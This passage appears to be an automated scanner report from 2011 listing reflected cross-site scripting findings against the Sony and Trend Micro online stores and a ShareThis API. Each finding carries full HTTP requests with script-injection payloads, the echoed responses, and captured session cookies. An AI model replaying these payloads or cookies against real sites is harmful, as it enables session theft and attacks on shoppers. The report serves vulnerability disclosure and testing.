Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6f1"><a>edd0ae37b53 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=02d6f1"><a>edd0ae37b53&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115107
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115107
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:38 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&storeId=10151&y=0&catalogId=10551&Nty=1&x=02d6f1"><a>edd0ae37b53" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ce3"><a>5cf4dd19a25 was submitted in the y parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=045ce3"><a>5cf4dd19a25 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115107
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115107
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:51 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&storeId=10151&y=045ce3"><a>5cf4dd19a25&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c14cf--><script>alert(1)</script>aecb86347bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&c14cf--><script>alert(1)</script>aecb86347bd=1 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360797589,0)
Date: Tue, 06 Sep 2011 18:21:54 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=5089ab1c&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&c14cf--><script>alert(1)</script>aecb86347bd=1&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAnonymousPage"-->
...[SNIP]...

1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The value of the paymentMethodID%24%2452524 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3e0"><script>alert(1)</script>44993469a8dc0473c was submitted in the paymentMethodID%24%2452524 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-12c3e0"><script>alert(1)</script>44993469a8dc0473c&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US
Cache-Control: max-age=0
Origin: https://store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065992664,0)
Date: Tue, 06 Sep 2011 18:24:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56872


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<input type="radio" name="paymentMethodID" value="-12c3e0"><script>alert(1)</script>44993469a8dc0473c" onclick="dispPaymentOption(this.id);dispHandle('autoBill');" id="CreditCardMethod">
...[SNIP]...

1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The value of the paymentMethodID%24%2452525 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2d18"><script>alert(1)</script>7d2d858457eeab20b was submitted in the paymentMethodID%24%2452525 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000e2d18"><script>alert(1)</script>7d2d858457eeab20b&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-1&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US
Cache-Control: max-age=0
Origin: https://store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065978905,0)
Date: Tue, 06 Sep 2011 18:24:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<input type="radio" name="paymentMethodID" value="190000e2d18"><script>alert(1)</script>7d2d858457eeab20b" onclick="dispPaymentOption(this.id);dispHandle('autoHide')" id="PayPalExpress">
...[SNIP]...

1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4556%3balert(1)//83e614a352a was submitted in the cb parameter. This input was echoed as b4556;alert(1)//83e614a352a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/getCount2.php?cb=stButtons.processCBb4556%3balert(1)//83e614a352a&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 297

